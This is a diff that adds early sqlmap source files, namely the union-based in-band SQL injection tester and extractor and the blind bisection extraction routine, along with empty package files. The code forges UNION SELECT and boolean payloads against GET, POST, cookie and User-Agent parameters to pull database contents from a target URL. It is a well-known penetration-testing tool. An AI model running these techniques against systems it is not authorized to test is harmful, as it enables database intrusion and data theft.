After the storm, a restore..

lib/techniques/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id: __init__.py 214 2008-07-14 14:17:06Z inquisb $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

lib/techniques/inband/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id: __init__.py 214 2008-07-14 14:17:06Z inquisb $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

lib/techniques/inband/union/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id: __init__.py 214 2008-07-14 14:17:06Z inquisb $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

lib/techniques/inband/union/test.py

@@ -0,0 +1,114 @@
+#!/usr/bin/env python
+
+"""
+$Id: test.py 293 2008-07-28 21:56:52Z inquisb $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+from lib.core.agent import agent
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.session import setUnion
+from lib.request.connect import Connect as Request
+
+
+def __effectiveUnionTest(query, comment):
+    """
+    This method tests if the target url is affected by an inband
+    SQL injection vulnerability. The test is done up to 50 columns
+    on the target database table
+    """
+
+    resultDict = {}
+
+    for count in range(0, 50):
+        if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
+            query = query[:-len(" FROM DUAL")]
+
+        if count:
+            query += ", NULL"
+
+        if kb.dbms == "Oracle":
+            query += " FROM DUAL"
+
+        commentedQuery = agent.postfixQuery(query, comment)
+        payload = agent.payload(newValue=commentedQuery)
+        newResult = Request.queryPage(payload)
+
+        if not newResult in resultDict.keys():
+            resultDict[newResult] = (1, commentedQuery)
+        else:
+            resultDict[newResult] = (resultDict[newResult][0] + 1, commentedQuery)
+
+        if count:
+            for element in resultDict.values():
+                if element[0] == 1:
+                    if kb.injPlace == "GET":
+                        value = "%s?%s" % (conf.url, payload)
+                    elif kb.injPlace == "POST":
+                        value  = "URL:\t'%s'" % conf.url
+                        value += "\nPOST:\t'%s'\n" % payload
+                    elif kb.injPlace == "Cookie":
+                        value  = "URL:\t'%s'" % conf.url
+                        value += "\nCookie:\t'%s'\n" % payload
+                    elif kb.injPlace == "User-Agent":
+                        value  = "URL:\t\t'%s'" % conf.url
+                        value += "\nUser-Agent:\t'%s'\n" % payload
+
+                    return value
+
+    return None
+
+
+def unionTest():
+    """
+    This method tests if the target url is affected by an inband
+    SQL injection vulnerability. The test is done up to 3*50 times
+    """
+
+    logMsg  = "testing inband sql injection on parameter "
+    logMsg += "'%s'" % kb.injParameter
+    logger.info(logMsg)
+
+    value = ""
+
+    query = agent.prefixQuery("UNION ALL SELECT NULL")
+
+    for comment in ("--", "#", "/*", ";", "%00"):
+        value = __effectiveUnionTest(query, comment)
+
+        if value:
+            setUnion(comment, value.count("NULL"))
+
+            break
+
+    if kb.unionCount:
+        logMsg  = "the target url could be affected by an "
+        logMsg += "inband sql injection vulnerability"
+        logger.info(logMsg)
+    else:
+        warnMsg  = "the target url is not affected by an "
+        warnMsg += "inband sql injection vulnerability"
+        logger.warn(warnMsg)
+
+    return value

lib/techniques/inband/union/use.py

@@ -0,0 +1,154 @@
+#!/usr/bin/env python
+
+"""
+$Id: use.py 293 2008-07-28 21:56:52Z inquisb $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+import time
+
+from lib.core.agent import agent
+from lib.core.common import randomStr
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.data import temp
+from lib.core.exception import sqlmapUnsupportedDBMSException
+from lib.core.session import setUnion
+from lib.core.unescaper import unescaper
+from lib.parse.html import htmlParser
+from lib.request.connect import Connect as Request
+from lib.techniques.inband.union.test import unionTest
+
+
+def __unionPosition(count, expression):
+    logMsg  = "confirming inband sql injection on parameter "
+    logMsg += "'%s'" % kb.injParameter
+    logger.info(logMsg)
+
+    # For each column of the table (# of NULL) perform a request using
+    # the UNION ALL SELECT statement to test it the target url is
+    # affected by an exploitable inband SQL injection vulnerability
+    for exprPosition in range(0, kb.unionCount):
+        # Prepare expression with delimiters
+        randQuery = randomStr()
+        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
+        randQueryUnescaped = unescaper.unescape(randQueryProcessed)
+
+        if len(randQueryUnescaped) > len(expression):
+            blankCount = len(randQueryUnescaped) - len(expression)
+            expression = (" " * blankCount) + expression
+        elif len(randQueryUnescaped) < len(expression):
+            blankCount = len(expression) - len(randQueryUnescaped)
+            randQueryUnescaped = (" " * blankCount) + randQueryUnescaped
+
+        # Forge the inband SQL injection request
+        query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
+        payload = agent.payload(newValue=query)
+
+        # Perform the request
+        resultPage = Request.queryPage(payload, content=True)
+        count += 1
+
+        # We have to assure that the randQuery value is not within the
+        # HTML code of the result page because, for instance, it is there
+        # when the query is wrong and the back-end DBMS is Microsoft SQL
+        # server
+        htmlParsed = htmlParser(resultPage, paths.ERRORS_XML)
+
+        if randQuery in resultPage and not htmlParsed:
+            setUnion(position=exprPosition)
+
+            break
+
+    if isinstance(kb.unionPosition, int):
+        logMsg  = "the target url is affected by an exploitable "
+        logMsg += "inband sql injection vulnerability"
+        logger.info(logMsg)
+    else:
+        warnMsg  = "the target url is not affected by an exploitable "
+        warnMsg += "inband sql injection vulnerability, sqlmap will "
+        warnMsg += "retrieve the expression output through blind sql "
+        warnMsg += "injection technique"
+        logger.warn(warnMsg)
+
+    return count
+
+
+def unionUse(expression):
+    """
+    This function tests for an inband SQL injection on the target
+    url then call its subsidiary function to effectively perform an
+    inband SQL injection on the affected url
+    """
+
+    count = 0
+    origExpr = expression
+    start = time.time()
+
+    if not kb.unionCount:
+        unionTest()
+
+    if not kb.unionCount:
+        return
+
+    # Prepare expression with delimiters
+    expression = agent.concatQuery(expression)
+    expression = unescaper.unescape(expression)
+
+    # Confirm the inband SQL injection and get the exact column
+    # position only once
+    if not isinstance(kb.unionPosition, int):
+        count = __unionPosition(count, expression)
+
+        # Assure that the above function found the exploitable inband
+        # SQL injection position
+        if not isinstance(kb.unionPosition, int):
+            return
+
+    # Forge the inband SQL injection request
+    query = agent.forgeInbandQuery(expression)
+    payload = agent.payload(newValue=query)
+
+    logMsg = "query: %s" % query
+    logger.info(logMsg)
+
+    # Perform the request
+    resultPage = Request.queryPage(payload, content=True)
+    count += 1
+
+    if temp.start not in resultPage or temp.stop not in resultPage:
+        return
+
+    duration = int(time.time() - start)
+
+    logMsg = "performed %d queries in %d seconds" % (count, duration)
+    logger.info(logMsg)
+
+    # Parse the returned page to get the exact inband
+    # sql injection output
+    startPosition = resultPage.index(temp.start)
+    endPosition = resultPage.rindex(temp.stop) + len(temp.stop)
+    value = str(resultPage[startPosition:endPosition])
+
+    return value

lib/techniques/inference/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id: __init__.py 214 2008-07-14 14:17:06Z inquisb $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

lib/techniques/inference/blind.py

@@ -0,0 +1,213 @@
+#!/usr/bin/env python
+
+"""
+$Id: blind.py 355M 2008-10-15 00:00:47Z (local) $
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+import threading
+import time
+
+from lib.core.agent import agent
+from lib.core.common import dataToSessionFile
+from lib.core.common import dataToStdout
+from lib.core.common import replaceNewlineTabs
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.exception import sqlmapValueException
+from lib.core.progress import ProgressBar
+from lib.core.unescaper import unescaper
+from lib.request.connect import Connect as Request
+
+
+def bisection(payload, expression, length=None):
+    """
+    Bisection algorithm that can be used to perform blind SQL injection
+    on an affected host
+    """
+
+    if kb.dbmsDetected:
+        _, _, _, fieldToCast = agent.getFields(expression)
+        nulledCastedField    = agent.nullAndCastField(fieldToCast)
+        expressionReplaced   = expression.replace(fieldToCast, nulledCastedField, 1)
+        expressionUnescaped  = unescaper.unescape(expressionReplaced)
+    else:
+        expressionUnescaped  = unescaper.unescape(expression)
+
+    infoMsg = "query: %s" % expressionUnescaped
+    logger.info(infoMsg)
+
+    if length and not isinstance(length, int) and length.isdigit():
+        length = int(length)
+
+    if length == 0:
+        return 0, ""
+
+    showEta = conf.eta and length
+    numThreads = min(conf.threads, length)
+    threads = []
+
+    if showEta:
+        progress = ProgressBar(maxValue=length)
+        progressTime = []
+
+    if conf.verbose in ( 1, 2 ) and not showEta:
+        if isinstance(length, int) and conf.threads > 1:
+            infoMsg = "starting %d threads" % numThreads
+            logger.info(infoMsg)
+
+            dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * length))
+            dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
+        else:
+            dataToStdout("[%s] [INFO] retrieved: " % time.strftime("%X"))
+
+    queriesCount = [0]    # As list to deal with nested scoping rules
+
+
+    def getChar(idx):
+        maxValue = 127
+        minValue = 0
+
+        while (maxValue - minValue) != 1:
+            queriesCount[0] += 1
+            limit = ((maxValue + minValue) / 2)
+
+            forgedPayload = payload % (expressionUnescaped, idx, limit)
+            result = Request.queryPage(forgedPayload)
+
+            if result == kb.defaultResult:
+                minValue = limit
+            else:
+                maxValue = limit
+
+            if (maxValue - minValue) == 1:
+                if maxValue == 1:
+                    return None
+                else:
+                    return chr(minValue + 1)
+
+
+    def etaProgressUpdate(charTime, index):
+        if len(progressTime) <= ( (length * 3) / 100 ):
+            eta = 0
+        else:
+            midTime = sum(progressTime) / len(progressTime)
+            midTimeWithLatest = (midTime + charTime) / 2
+            eta = midTimeWithLatest * (length - index) / conf.threads
+
+        progressTime.append(charTime)
+        progress.update(index)
+        progress.draw(eta)
+
+
+    if conf.threads > 1 and isinstance(length, int) and length > 1:
+        value   = [None] * length
+        index   = [0]    # As list for python nested function scoping
+        idxlock = threading.Lock()
+        iolock  = threading.Lock()
+
+
+        def downloadThread():
+            while True:
+                idxlock.acquire()
+
+                if index[0] >= length:
+                    idxlock.release()
+
+                    return
+
+                index[0] += 1
+                curidx = index[0]
+                idxlock.release()
+
+                charStart = time.time()
+                val = getChar(curidx)
+
+                if val == None:
+                    raise sqlmapValueException, "Failed to get character at index %d (expected %d total)" % (curidx, length)
+
+                value[curidx-1] = val
+
+                if showEta:
+                    etaProgressUpdate(time.time() - charStart, index[0])
+                elif conf.verbose in ( 1, 2 ):
+                    s = "".join([c or "_" for c in value])
+                    iolock.acquire()
+                    dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), s))
+                    iolock.release()
+
+        # Start the threads
+        for _ in range(numThreads):
+            thread = threading.Thread(target=downloadThread)
+            thread.start()
+            threads.append(thread)
+
+        # And wait for them to all finish
+        for thread in threads:
+            thread.join()
+
+        assert None not in value
+
+        value = "".join(value)
+
+        assert index[0] == length
+
+        if conf.sessionFile:
+            dataToSessionFile(replaceNewlineTabs(value))
+
+        if conf.verbose in ( 1, 2 ) and not showEta:
+            dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), value))
+
+    else:
+        value = ""
+        index = 0
+
+        while True:
+            index += 1
+            charStart = time.time()
+            val = getChar(index)
+
+            if val == None:
+                break
+
+            value += val
+
+            if conf.sessionFile:
+                dataToSessionFile(replaceNewlineTabs(val))
+
+            if showEta:
+                etaProgressUpdate(time.time() - charStart, index)
+            elif conf.verbose in ( 1, 2 ):
+                dataToStdout(val)
+
+    if conf.verbose in ( 1, 2 ) or showEta:
+        dataToStdout("\n")
+
+    if ( conf.verbose in ( 1, 2 ) and showEta and len(str(progress)) >= 64 ) or conf.verbose >= 3:
+        infoMsg = "retrieved: %s" % value
+        logger.info(infoMsg)
+
+    if conf.sessionFile:
+        dataToSessionFile("]\n")
+
+    return queriesCount[0], value